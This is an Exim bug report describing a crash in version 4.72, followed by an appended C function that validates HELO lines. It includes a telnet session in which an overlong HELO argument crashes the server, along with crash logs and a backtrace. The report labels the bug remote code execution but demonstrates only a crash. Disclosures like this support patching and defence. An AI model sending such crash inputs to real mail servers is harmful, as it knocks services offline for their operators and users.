http://bugs.exim.org/show_bug.cgi?id=1580

           Summary: 【remote exec vulnerability】
           Product: Exim
           Version: 4.72
          Platform: Other
        OS/Version: Windows
            Status: NEW
          Severity: security
          Priority: critical
         Component: Eximon
        AssignedTo: [email protected]
        ReportedBy: [email protected]
                CC: [email protected]

Created an attachment (id=785)
 --> (http://bugs.exim.org/attachment.cgi?id=785)
conf file

This is a remote code exec vulnerability.

crash report:

Jan 29 00:55:13 localhost kernel: exim[25432]: segfault at 18 ip 00007fcb67c254fd sp 00007fff66f272b0 error 4 in libc-2.12.so[7fcb67bad000+18a000]
Jan 29 00:58:45 localhost kernel: exim[25471]: segfault at 18 ip 00007feae99034fd sp 00007ffff8aefaf0 error 4 in libc-2.12.so[7feae988b000+18a000]

If the client does the following, the server will crash:

[root@localhost ~]# telnet 192.168.77.98 25
Trying 192.168.77.98...
Connected to 192.168.77.98.
Escape character is '^]'.
220 localhost.localdomain ESMTP Exim 4.72 Thu, 29 Jan 2015 01:01:15 +0800
127.0.0.1
500 unrecognized command
helo
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Connection closed by foreign host. 

debug info:

(gdb) bt
#0  0x00007f840a11a625 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1  0x00007f840a11be05 in abort () at abort.c:92
#2  0x00007f840a158537 in __libc_message (do_abort=2, fmt=0x7f840a240900 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:198
#3  0x00007f840a15de66 in malloc_printerr (action=3, str=0x7f840a240c00 "free(): invalid next size (normal)", ptr=<value optimized out>) at malloc.c:6336
#4  0x00007f840a1609b3 in _int_free (av=0x7f840a477e80, p=0x7f840de4d8b0, have_lock=0) at malloc.c:4832
#5  0x00007f840a14e4cd in _IO_new_fclose (fp=0x7f840de4d8c0) at iofclose.c:88
#6  0x00007f840ca37e7d in os_find_running_interfaces_linux () at os.c:148
#7  0x00007f840ca2f01d in host_find_interfaces () at host.c:834
#8  0x00007f840ca2f27b in host_scan_for_local_hosts (host=<value optimized out>, lastptr=0x7fff2d907110, removed=0x0) at host.c:1328
#9  0x00007f840ca2f821 in host_find_byname (host=0x7fff2d907160, ignore_target_hosts=0x0, flags=<value optimized out>, fully_qualified_name=0x0, local_host_check=1) at host.c:2109
#10 0x00007f840ca58120 in smtp_verify_helo () at smtp_in.c:2492
#11 0x00007f840ca5a8d4 in smtp_setup_msg () at smtp_in.c:2919
#12 0x00007f840ca05ade in handle_smtp_call () at daemon.c:506
#13 daemon_go () at daemon.c:1875
#14 0x00007f840ca192ac in main (argc=3, cargv=<value optimized out>) at exim.c:4262

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-dev Exim details at http://www.exim.org/ ##
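
The backtrace above reaches host_find_byname() from smtp_verify_helo(), so the HELO argument in the session is handed to host lookup, and that argument is far longer than the size limits RFC 5321 allows. As an added example (not part of the bug report and not Exim code), this is a stand-alone syntactic pre-check that a filter in front of an MTA could apply to HELO/EHLO lines; the function and enum names are hypothetical, and the check does not identify or fix the underlying heap corruption.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Size limits from RFC 5321 section 4.5.3.1; label limit from RFC 1035. */
#define SMTP_MAX_LINE   512   /* whole command line, CRLF included */
#define SMTP_MAX_DOMAIN 255
#define DNS_MAX_LABEL    63

enum helo_verdict { HELO_OK, NOT_HELO, LINE_TOO_LONG, DOMAIN_TOO_LONG, BAD_LABEL, BAD_CHAR };

static int is_helo_verb(const char *line)
{
    char verb[6] = {0};
    for (int i = 0; i < 5 && line[i]; i++)
        verb[i] = (char)tolower((unsigned char)line[i]);
    return strcmp(verb, "helo ") == 0 || strcmp(verb, "ehlo ") == 0;
}

/* Hypothetical helper: `line` is one received command, CRLF already stripped. */
enum helo_verdict check_helo_line(const char *line)
{
    size_t len = strlen(line);
    if (!is_helo_verb(line)) return NOT_HELO;
    if (len + 2 > SMTP_MAX_LINE) return LINE_TOO_LONG;
    const char *arg = line + 5;
    size_t arglen = len - 5, label = 0;
    if (arglen > SMTP_MAX_DOMAIN) return DOMAIN_TOO_LONG;
    if (arglen == 0) return BAD_LABEL;
    if (arg[0] == '[')            /* address literal: bracket check only */
        return arg[arglen - 1] == ']' ? HELO_OK : BAD_CHAR;
    for (size_t i = 0; i < arglen; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (c == '.') {
            if (label == 0) return BAD_LABEL;   /* empty label */
            label = 0;
        } else if (isalnum(c) || c == '-') {
            if (++label > DNS_MAX_LABEL) return BAD_LABEL;
        } else return BAD_CHAR;
    }
    return label == 0 ? BAD_LABEL : HELO_OK;    /* trailing dot rejected */
}

int main(void)
{
    char line[5 + 1000 + 1] = "helo ";  /* constructed sample: 1000 zeros */
    memset(line + 5, '0', 1000);        /* last byte stays NUL from the initialiser */
    printf("verdict=%d\n", check_helo_line(line));
    return 0;
}
```

Anything other than HELO_OK or NOT_HELO can be answered with a 501 syntax error before the argument reaches name resolution.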
